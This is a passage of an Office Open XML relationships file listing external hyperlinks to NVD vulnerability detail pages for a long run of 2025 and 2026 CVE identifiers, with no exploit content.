Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86808" TargetMode="External" Id="rId1990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-14945" TargetMode="External" Id="rId1991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64542" TargetMode="External" Id="rId1992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64584" TargetMode="External" Id="rId1993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64588" TargetMode="External" Id="rId1994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64589" TargetMode="External" Id="rId1995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64610" TargetMode="External" Id="rId1996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64618" TargetMode="External" Id="rId1997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64830" TargetMode="External" Id="rId1998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64838" TargetMode="External" Id="rId1999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64854" TargetMode="External" Id="rId2000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64866" TargetMode="External" Id="rId2001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-64868" TargetMode="External" Id="rId2002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12843" TargetMode="External" Id="rId2003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15247" TargetMode="External" Id="rId2004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16892" TargetMode="External" Id="rId2005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18957" TargetMode="External" Id="rId2006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19057" TargetMode="External" Id="rId2007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19479" TargetMode="External" Id="rId2008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19612" TargetMode="External" Id="rId2009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19644" TargetMode="External" Id="rId2010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19713" TargetMode="External" Id="rId2011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2520" TargetMode="External" Id="rId2012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27227" TargetMode="External" Id="rId2013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52307" TargetMode="External" Id="rId2014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55513" TargetMode="External" Id="rId2015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69402" TargetMode="External" Id="rId2016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69417" TargetMode="External" Id="rId2017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69690" TargetMode="External" Id="rId2018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71356" TargetMode="External" Id="rId2019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71357" TargetMode="External" Id="rId2020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71388" TargetMode="External" Id="rId2021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71440" TargetMode="External" Id="rId2022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71565" TargetMode="External" Id="rId2023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72626" TargetMode="External" Id="rId2024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72627" TargetMode="External" Id="rId2025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75629" TargetMode="External" Id="rId2026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75635" TargetMode="External" Id="rId2027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75636" TargetMode="External" Id="rId2028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75637" TargetMode="External" Id="rId2029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75639" TargetMode="External" Id="rId2030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75640" TargetMode="External" Id="rId2031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75642" TargetMode="External" Id="rId2032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75643" TargetMode="External" Id="rId2033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75644" TargetMode="External" Id="rId2034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75646" TargetMode="External" Id="rId2035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75647" TargetMode="External" Id="rId2036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75651" TargetMode="External" Id="rId2037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75652" TargetMode="External" Id="rId2038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75657" TargetMode="External" Id="rId2039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75659" TargetMode="External" Id="rId2040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75660" TargetMode="External" Id="rId2041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75661" TargetMode="External" Id="rId2042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75666" TargetMode="External" Id="rId2043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75667" TargetMode="External" Id="rId2044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75668" TargetMode="External" Id="rId2045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75669" TargetMode="External" Id="rId2046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75670" TargetMode="External" Id="rId2047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75671" TargetMode="External" Id="rId2048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75672" TargetMode="External" Id="rId2049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75674" TargetMode="External" Id="rId2050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75675" TargetMode="External" Id="rId2051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75677" TargetMode="External" Id="rId2052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75678" TargetMode="External" Id="rId2053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75679" TargetMode="External" Id="rId2054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75680" TargetMode="External" Id="rId2055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75681" TargetMode="External" Id="rId2056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75683" TargetMode="External" Id="rId2057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75685" TargetMode="External" Id="rId2058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75687" TargetMode="External" Id="rId2059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75690" TargetMode="External" Id="rId2060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75691" TargetMode="External" Id="rId2061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75692" TargetMode="External" Id="rId2062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75693" TargetMode="External" Id="rId2063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75694" TargetMode="External" Id="rId2064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75695" TargetMode="External" Id="rId2065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75696" TargetMode="External" Id="rId2066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75700" TargetMode="External" Id="rId2067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75701" TargetMode="External" Id="rId2068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75702" TargetMode="External" Id="rId2069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75704" TargetMode="External" Id="rId2070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75705" TargetMode="External" Id="rId2071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75706" TargetMode="External" Id="rId2072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75707" TargetMode="External" Id="rId2073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75708" TargetMode="External" Id="rId2074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75709" TargetMode="External" Id="rId2075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75710" TargetMode="External" Id="rId2076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75711" TargetMode="External" Id="rId2077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75712" TargetMode="External" Id="rId2078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75713" TargetMode="External" Id="rId2079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75714" TargetMode="External" Id="rId2080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75715" TargetMode="External" Id="rId2081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75716" TargetMode="External" Id="rId2082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75717" TargetMode="External" Id="rId2083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75718" TargetMode="External" Id="rId2084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75719" TargetMode="External" Id="rId2085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75720" TargetMode="External" Id="rId2086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75722" TargetMode="External" Id="rId2087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75724" TargetMode="External" Id="rId2088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75725" TargetMode="External" Id="rId2089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75727" TargetMode="External" Id="rId2090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75729" TargetMode="External" Id="rId2091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75730" TargetMode="External" Id="rId2092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75731" TargetMode="External" Id="rId2093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75733" TargetMode="External" Id="rId2094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75734" TargetMode="External" Id="rId2095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75735" TargetMode="External" Id="rId2096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75736" TargetMode="External" Id="rId2097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75737" TargetMode="External" Id="rId2098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75738" TargetMode="External" Id="rId2099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75739" TargetMode="External" Id="rId2100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75740" TargetMode="External" Id="rId2101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75741" TargetMode="External" Id="rId2102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75742" TargetMode="External" Id="rId2103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79905" TargetMode="External" Id="rId2104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82396" TargetMode="External" Id="rId2105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84330" TargetMode="External" Id="rId2106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84385" TargetMode="External" Id="rId2107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86996" TargetMode="External" Id="rId2108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-15691" TargetMode="External" Id="rId2109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12962" TargetMode="External" Id="rId2110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14350" TargetMode="External" Id="rId2111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15937" TargetMode="External" Id="rId2112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17517" TargetMode="External" Id="rId2113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19032" TargetMode="External" Id="rId2114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19614" TargetMode="External" Id="rId2115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19625" TargetMode="External" Id="rId2116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33389" TargetMode="External" Id="rId2117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-33391" TargetMode="External" Id="rId2118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34959" TargetMode="External" Id="rId2119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34967" TargetMode="External" Id="rId2120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47680" TargetMode="External" Id="rId2121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56704" TargetMode="External" Id="rId2122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70575" TargetMode="External" Id="rId2123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71216" TargetMode="External" Id="rId2124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77121" TargetMode="External" Id="rId2125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77122" TargetMode="External" Id="rId2126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77132" TargetMode="External" Id="rId2127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77639" TargetMode="External" Id="rId2128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77640" TargetMode="External" Id="rId2129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78149" TargetMode="External" Id="rId2130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78446" TargetMode="External" Id="rId2131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78602" TargetMode="External" Id="rId2132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78631" TargetMode="External" Id="rId2133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79630" TargetMode="External" Id="rId2134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79631" TargetMode="External" Id="rId2135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79632" TargetMode="External" Id="rId2136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81380" TargetMode="External" Id="rId2137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81424" TargetMode="External" Id="rId2138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82023" TargetMode="External" Id="rId2139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82394" TargetMode="External" Id="rId2140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82395" TargetMode="External" Id="rId2141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82878" TargetMode="External" Id="rId2142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82879" TargetMode="External" Id="rId2143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84043" TargetMode="External" Id="rId2144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84044" TargetMode="External" Id="rId2145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84045" TargetMode="External" Id="rId2146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84146" TargetMode="External" Id="rId2147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84191" TargetMode="External" Id="rId2148" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84207" TargetMode="External" Id="rId2149" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84936" TargetMode="External" Id="rId2150" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85038" TargetMode="External" Id="rId2151" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85157" TargetMode="External" Id="rId2152" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85158" TargetMode="External" Id="rId2153" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85159" 